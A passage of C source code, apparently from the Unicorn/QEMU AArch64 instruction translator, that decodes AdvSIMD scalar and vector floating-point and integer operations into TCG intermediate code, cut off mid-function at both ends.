TCG_COND_GEU : TCG_COND_GE; goto do_cmop; case 0x11: /* CMTST, CMEQ */ if (u) { cond = TCG_COND_EQ; goto do_cmop; } gen_cmtst_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 0x8: /* SSHL, USHL */ if (u) { gen_ushl_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } else { gen_sshl_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } break; case 0x9: /* SQSHL, UQSHL */ if (u) { gen_helper_neon_qshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0xa: /* SRSHL, URSHL */ if (u) { gen_helper_neon_rshl_u64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } else { gen_helper_neon_rshl_s64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } break; case 0xb: /* SQRSHL, UQRSHL */ if (u) { gen_helper_neon_qrshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } else { gen_helper_neon_qrshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); } break; case 0x10: /* ADD, SUB */ if (u) { tcg_gen_sub_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } else { tcg_gen_add_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); } break; default: g_assert_not_reached(); } } /* Handle the 3-same-operands float operations; shared by the scalar * and vector encodings. The caller must filter out any encodings * not allocated for the encoding it is dealing with. */ static void handle_3same_float(DisasContext *s, int size, int elements, int fpopcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int pass; TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); for (pass = 0; pass < elements; pass++) { if (size) { /* Double */ TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, pass, MO_64); read_vec_element(s, tcg_op2, rm, pass, MO_64); switch (fpopcode) { case 0x39: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1); /* fall through */ case 0x19: /* FMLA */ read_vec_element(s, tcg_res, rd, pass, MO_64); gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0x18: /* FMAXNM */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1a: /* FADD */ gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1b: /* FMULX */ gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1c: /* FCMEQ */ gen_helper_neon_ceq_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1e: /* FMAX */ gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1f: /* FRECPS */ gen_helper_recpsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x38: /* FMINNM */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3a: /* FSUB */ gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3e: /* FMIN */ gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3f: /* FRSQRTS */ gen_helper_rsqrtsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5b: /* FMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5c: /* FCMGE */ gen_helper_neon_cge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5d: /* FACGE */ gen_helper_neon_acge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5f: /* FDIV */ gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7a: /* FABD */ gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); 
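/* FABD has no dedicated double-precision helper: subtract first, then clear the sign via the fabs below. */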
gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_res); break; case 0x7c: /* FCMGT */ gen_helper_neon_cgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7d: /* FACGT */ gen_helper_neon_acgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } else { /* Single */ TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); switch (fpopcode) { case 0x39: /* FMLS */ /* As usual for ARM, separate negation for fused multiply-add */ gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1); /* fall through */ case 0x19: /* FMLA */ read_vec_element_i32(s, tcg_res, rd, pass, MO_32); gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_res, fpst); break; case 0x1a: /* FADD */ gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1b: /* FMULX */ gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1c: /* FCMEQ */ gen_helper_neon_ceq_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1e: /* FMAX */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1f: /* FRECPS */ gen_helper_recpsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x18: /* FMAXNM */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x38: /* FMINNM */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3a: /* FSUB */ gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3e: /* FMIN */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3f: /* FRSQRTS */ gen_helper_rsqrtsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5b: /* FMUL */ gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5c: /* FCMGE */ gen_helper_neon_cge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5d: /* FACGE */ gen_helper_neon_acge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5f: /* FDIV */ gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7a: /* FABD */ gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_res); break; case 0x7c: /* FCMGT */ gen_helper_neon_cgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7d: /* FACGT */ gen_helper_neon_acgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } if (elements == 1) { /* scalar single so clear high part */ TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, tcg_tmp, tcg_res); write_vec_element(s, tcg_tmp, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } else { write_vec_element_i32(s, tcg_res, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } } tcg_temp_free_ptr(tcg_ctx, fpst); clear_vec_high(s, elements * (size ? 
8 : 4) > 8, rd); } /* AdvSIMD scalar three same * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 * +-----+---+-----------+------+---+------+--------+---+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | * +-----+---+-----------+------+---+------+--------+---+------+------+ */ static void disas_simd_scalar_three_reg_same(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 5); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); TCGv_i64 tcg_rd; if (opcode >= 0x18) { /* Floating point: U, size[1] and opcode indicate operation */ int fpopcode = opcode | (extract32(size, 1, 1) << 5) | (u << 6); switch (fpopcode) { case 0x1b: /* FMULX */ case 0x1f: /* FRECPS */ case 0x3f: /* FRSQRTS */ case 0x5d: /* FACGE */ case 0x7d: /* FACGT */ case 0x1c: /* FCMEQ */ case 0x5c: /* FCMGE */ case 0x7c: /* FCMGT */ case 0x7a: /* FABD */ break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_3same_float(s, extract32(size, 0, 1), 1, fpopcode, rd, rn, rm); return; } switch (opcode) { case 0x1: /* SQADD, UQADD */ case 0x5: /* SQSUB, UQSUB */ case 0x9: /* SQSHL, UQSHL */ case 0xb: /* SQRSHL, UQRSHL */ break; case 0x8: /* SSHL, USHL */ case 0xa: /* SRSHL, URSHL */ case 0x6: /* CMGT, CMHI */ case 0x7: /* CMGE, CMHS */ case 0x11: /* CMTST, CMEQ */ case 0x10: /* ADD, SUB (vector) */ if (size != 3) { unallocated_encoding(s); return; } break; case 0x16: /* SQDMULH, SQRDMULH (vector) */ if (size != 1 && size != 2) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } tcg_rd = tcg_temp_new_i64(tcg_ctx); if (size == 3) { TCGv_i64 tcg_rn = read_fp_dreg(s, rn); TCGv_i64 tcg_rm = read_fp_dreg(s, rm); handle_3same_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rm); tcg_temp_free_i64(tcg_ctx, tcg_rn); tcg_temp_free_i64(tcg_ctx, tcg_rm); } else { /* Do a single operation on the lowest element in the vector. * We use the standard Neon helpers and rely on 0 OP 0 == 0 with * no side effects for all these operations. * OPTME: special-purpose helpers would avoid doing some * unnecessary work in the helper for the 8 and 16 bit cases. 
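* (The narrow elements are read zero-extended, so the unused upper lanes of the 32-bit temps compute 0 OP 0 and stay zero.)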
*/ NeonGenTwoOpEnvFn *genenvfn = NULL; TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rm = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rd32 = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_rn, rn, 0, size); read_vec_element_i32(s, tcg_rm, rm, 0, size); switch (opcode) { case 0x1: /* SQADD, UQADD */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qadd_s8, gen_helper_neon_qadd_u8 }, { gen_helper_neon_qadd_s16, gen_helper_neon_qadd_u16 }, { gen_helper_neon_qadd_s32, gen_helper_neon_qadd_u32 }, }; genenvfn = fns[size][u]; break; } case 0x5: /* SQSUB, UQSUB */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qsub_s8, gen_helper_neon_qsub_u8 }, { gen_helper_neon_qsub_s16, gen_helper_neon_qsub_u16 }, { gen_helper_neon_qsub_s32, gen_helper_neon_qsub_u32 }, }; genenvfn = fns[size][u]; break; } case 0x9: /* SQSHL, UQSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0xb: /* SQRSHL, UQRSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0x16: /* SQDMULH, SQRDMULH */ { static NeonGenTwoOpEnvFn * const fns[2][2] = { { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, }; assert(size == 1 || size == 2); genenvfn = fns[size - 1][u]; break; } default: g_assert_not_reached(); } genenvfn(tcg_ctx, tcg_rd32, tcg_ctx->cpu_env, tcg_rn, tcg_rm); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd32); tcg_temp_free_i32(tcg_ctx, tcg_rd32); tcg_temp_free_i32(tcg_ctx, tcg_rn); tcg_temp_free_i32(tcg_ctx, tcg_rm); } write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); } /* AdvSIMD scalar three same FP16 * 31 30 29 28 24 23 22 21 20 16 15 14 13 11 10 9 5 4 0 * +-----+---+-----------+---+-----+------+-----+--------+---+----+----+ * | 0 1 | U | 1 1 1 1 0 | a | 1 0 | Rm | 0 0 | opcode | 1 | Rn | Rd | * +-----+---+-----------+---+-----+------+-----+--------+---+----+----+ * v: 0101 1110 0100 0000 0000 0100 0000 0000 => 5e400400 * m: 1101 1111 0110 0000 1100 0100 0000 0000 => df60c400 */ static void disas_simd_scalar_three_reg_same_fp16(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 3); int rm = extract32(insn, 16, 5); bool u = extract32(insn, 29, 1); bool a = extract32(insn, 23, 1); int fpopcode = opcode | (a << 3) | (u << 4); TCGv_ptr fpst; TCGv_i32 tcg_op1; TCGv_i32 tcg_op2; TCGv_i32 tcg_res; switch (fpopcode) { case 0x03: /* FMULX */ case 0x04: /* FCMEQ (reg) */ case 0x07: /* FRECPS */ case 0x0f: /* FRSQRTS */ case 0x14: /* FCMGE (reg) */ case 0x15: /* FACGE */ case 0x1a: /* FABD */ case 0x1c: /* FCMGT (reg) */ case 0x1d: /* FACGT */ break; default: unallocated_encoding(s); return; } if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } fpst = get_fpstatus_ptr(tcg_ctx, true); tcg_op1 = read_fp_hreg(s, rn); tcg_op2 = read_fp_hreg(s, rm); tcg_res = tcg_temp_new_i32(tcg_ctx); switch (fpopcode) { case 0x03: /* FMULX */ gen_helper_advsimd_mulxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x04: /*
FCMEQ (reg) */ gen_helper_advsimd_ceq_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x07: /* FRECPS */ gen_helper_recpsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x0f: /* FRSQRTS */ gen_helper_rsqrtsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x14: /* FCMGE (reg) */ gen_helper_advsimd_cge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x15: /* FACGE */ gen_helper_advsimd_acge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1a: /* FABD */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_res, 0x7fff); break; case 0x1c: /* FCMGT (reg) */ gen_helper_advsimd_cgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1d: /* FACGT */ gen_helper_advsimd_acgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_ptr(tcg_ctx, fpst); } /* AdvSIMD scalar three same extra * 31 30 29 28 24 23 22 21 20 16 15 14 11 10 9 5 4 0 * +-----+---+-----------+------+---+------+---+--------+---+----+----+ * | 0 1 | U | 1 1 1 1 0 | size | 0 | Rm | 1 | opcode | 1 | Rn | Rd | * +-----+---+-----------+------+---+------+---+--------+---+----+----+ */ static void disas_simd_scalar_three_reg_same_extra(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 4); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); TCGv_i32 ele1, ele2, ele3; TCGv_i64 res; bool feature; switch (u * 16 + opcode) { case 0x10: /* SQRDMLAH (vector) */ case 0x11: /* SQRDMLSH (vector) */ if (size != 1 && size != 2) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_rdm, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* Do a single operation on the lowest element in the vector. * We use the standard Neon helpers and rely on 0 OP 0 == 0 * with no side effects for all these operations. * OPTME: special-purpose helpers would avoid doing some * unnecessary work in the helper for the 16 bit cases. 
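* (As above, the 16-bit elements are read zero-extended, so the upper lane of each 32-bit temp computes 0 OP 0.)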
*/ ele1 = tcg_temp_new_i32(tcg_ctx); ele2 = tcg_temp_new_i32(tcg_ctx); ele3 = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, ele1, rn, 0, size); read_vec_element_i32(s, ele2, rm, 0, size); read_vec_element_i32(s, ele3, rd, 0, size); switch (opcode) { case 0x0: /* SQRDMLAH */ if (size == 1) { gen_helper_neon_qrdmlah_s16(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } else { gen_helper_neon_qrdmlah_s32(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } break; case 0x1: /* SQRDMLSH */ if (size == 1) { gen_helper_neon_qrdmlsh_s16(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } else { gen_helper_neon_qrdmlsh_s32(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, ele1); tcg_temp_free_i32(tcg_ctx, ele2); res = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, res, ele3); tcg_temp_free_i32(tcg_ctx, ele3); write_fp_dreg(s, rd, res); tcg_temp_free_i64(tcg_ctx, res); } static void handle_2misc_64(DisasContext *s, int opcode, bool u, TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, TCGv_i32 tcg_rmode, TCGv_ptr tcg_fpstatus) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 64->64 opcodes which are shared between the scalar and * vector 2-reg-misc groups. We cover every integer opcode where size == 3 * is valid in either group and also the double-precision fp ops. * The caller need only provide tcg_rmode and tcg_fpstatus if the op * requires them. */ TCGCond cond; switch (opcode) { case 0x4: /* CLS, CLZ */ if (u) { tcg_gen_clzi_i64(tcg_ctx, tcg_rd, tcg_rn, 64); } else { tcg_gen_clrsb_i64(tcg_ctx, tcg_rd, tcg_rn); } break; case 0x5: /* NOT */ /* This opcode is shared with CNT and RBIT but we have earlier * enforced that size == 3 if and only if this is the NOT insn. */ tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rn); break; case 0x7: /* SQABS, SQNEG */ if (u) { gen_helper_neon_qneg_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); } else { gen_helper_neon_qabs_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); } break; case 0xa: /* CMLT */ /* 64 bit integer comparison against zero, result is * test ? (2^64 - 1) : 0. We implement this using setcond (test) * and then negating. */ cond = TCG_COND_LT; do_cmop: tcg_gen_setcondi_i64(tcg_ctx, cond, tcg_rd, tcg_rn, 0); tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); break; case 0x8: /* CMGT, CMGE */ cond = u ? TCG_COND_GE : TCG_COND_GT; goto do_cmop; case 0x9: /* CMEQ, CMLE */ cond = u ?
TCG_COND_LE : TCG_COND_EQ; goto do_cmop; case 0xb: /* ABS, NEG */ if (u) { tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rn); } else { tcg_gen_abs_i64(tcg_ctx, tcg_rd, tcg_rn); } break; case 0x2f: /* FABS */ gen_helper_vfp_absd(tcg_ctx, tcg_rd, tcg_rn); break; case 0x6f: /* FNEG */ gen_helper_vfp_negd(tcg_ctx, tcg_rd, tcg_rn); break; case 0x7f: /* FSQRT */ gen_helper_vfp_sqrtd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); break; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_tosqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_touqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ case 0x58: /* FRINTA */ case 0x79: /* FRINTI */ gen_helper_rintd(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; case 0x59: /* FRINTX */ gen_helper_rintd_exact(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; case 0x1e: /* FRINT32Z */ case 0x5e: /* FRINT32X */ gen_helper_frint32_d(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; case 0x1f: /* FRINT64Z */ case 0x5f: /* FRINT64X */ gen_helper_frint64_d(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; default: g_assert_not_reached(); } } static void handle_2misc_fcmp_zero(DisasContext *s, int opcode, bool is_scalar, bool is_u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_double = (size == MO_64); TCGv_ptr fpst; if (!fp_access_check(s)) { return; } fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); if (is_double) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); NeonGenTwoDoubleOPFn *genfn = NULL; bool swap = false; int pass; switch (opcode) { case 0x2e: /* FCMLT (zero) */ swap = true; /* fallthrough */ case 0x2c: /* FCMGT (zero) */ genfn = gen_helper_neon_cgt_f64; break; case 0x2d: /* FCMEQ (zero) */ genfn = gen_helper_neon_ceq_f64; break; case 0x6d: /* FCMLE (zero) */ swap = true; /* fall through */ case 0x6c: /* FCMGE (zero) */ genfn = gen_helper_neon_cge_f64; break; default: g_assert_not_reached(); } for (pass = 0; pass < (is_scalar ? 
1 : 2); pass++) { read_vec_element(s, tcg_op, rn, pass, MO_64); if (swap) { genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); } else { genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); } write_vec_element(s, tcg_res, rd, pass, MO_64); } tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_zero); tcg_temp_free_i64(tcg_ctx, tcg_op); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); NeonGenTwoSingleOPFn *genfn = NULL; bool swap = false; int pass, maxpasses; if (size == MO_16) { switch (opcode) { case 0x2e: /* FCMLT (zero) */ swap = true; /* fall through */ case 0x2c: /* FCMGT (zero) */ genfn = gen_helper_advsimd_cgt_f16; break; case 0x2d: /* FCMEQ (zero) */ genfn = gen_helper_advsimd_ceq_f16; break; case 0x6d: /* FCMLE (zero) */ swap = true; /* fall through */ case 0x6c: /* FCMGE (zero) */ genfn = gen_helper_advsimd_cge_f16; break; default: g_assert_not_reached(); } } else { switch (opcode) { case 0x2e: /* FCMLT (zero) */ swap = true; /* fall through */ case 0x2c: /* FCMGT (zero) */ genfn = gen_helper_neon_cgt_f32; break; case 0x2d: /* FCMEQ (zero) */ genfn = gen_helper_neon_ceq_f32; break; case 0x6d: /* FCMLE (zero) */ swap = true; /* fall through */ case 0x6c: /* FCMGE (zero) */ genfn = gen_helper_neon_cge_f32; break; default: g_assert_not_reached(); } } if (is_scalar) { maxpasses = 1; } else { int vector_size = 8 << is_q; maxpasses = vector_size >> size; } for (pass = 0; pass < maxpasses; pass++) { read_vec_element_i32(s, tcg_op, rn, pass, size); if (swap) { genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); } else { genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); } if (is_scalar) { write_fp_sreg(s, rd, tcg_res); } else { write_vec_element_i32(s, tcg_res, rd, pass, size); } } tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_zero); tcg_temp_free_i32(tcg_ctx, tcg_op); if (!is_scalar) { clear_vec_high(s, is_q, rd); } } tcg_temp_free_ptr(tcg_ctx, fpst); } static void handle_2misc_reciprocal(DisasContext *s, int opcode, bool is_scalar, bool is_u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_double = (size == 3); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); if (is_double) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); int pass; for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { read_vec_element(s, tcg_op, rn, pass, MO_64); switch (opcode) { case 0x3d: /* FRECPE */ gen_helper_recpe_f64(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x3f: /* FRECPX */ gen_helper_frecpx_f64(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f64(tcg_ctx, tcg_res, tcg_op, fpst); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_res, rd, pass, MO_64); } tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); int pass, maxpasses; if (is_scalar) { maxpasses = 1; } else { maxpasses = is_q ? 
4 : 2; } for (pass = 0; pass < maxpasses; pass++) { read_vec_element_i32(s, tcg_op, rn, pass, MO_32); switch (opcode) { case 0x3c: /* URECPE */ gen_helper_recpe_u32(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x3d: /* FRECPE */ gen_helper_recpe_f32(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x3f: /* FRECPX */ gen_helper_frecpx_f32(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f32(tcg_ctx, tcg_res, tcg_op, fpst); break; default: g_assert_not_reached(); } if (is_scalar) { write_fp_sreg(s, rd, tcg_res); } else { write_vec_element_i32(s, tcg_res, rd, pass, MO_32); } } tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); if (!is_scalar) { clear_vec_high(s, is_q, rd); } } tcg_temp_free_ptr(tcg_ctx, fpst); } static void handle_2misc_narrow(DisasContext *s, bool scalar, int opcode, bool u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 2-reg-misc ops which are narrowing (so each 2*size element * in the source becomes a size element in the destination). */ int pass; TCGv_i32 tcg_res[2]; int destelt = is_q ? 2 : 0; int passes = scalar ? 1 : 2; if (scalar) { tcg_res[1] = tcg_const_i32(tcg_ctx, 0); } for (pass = 0; 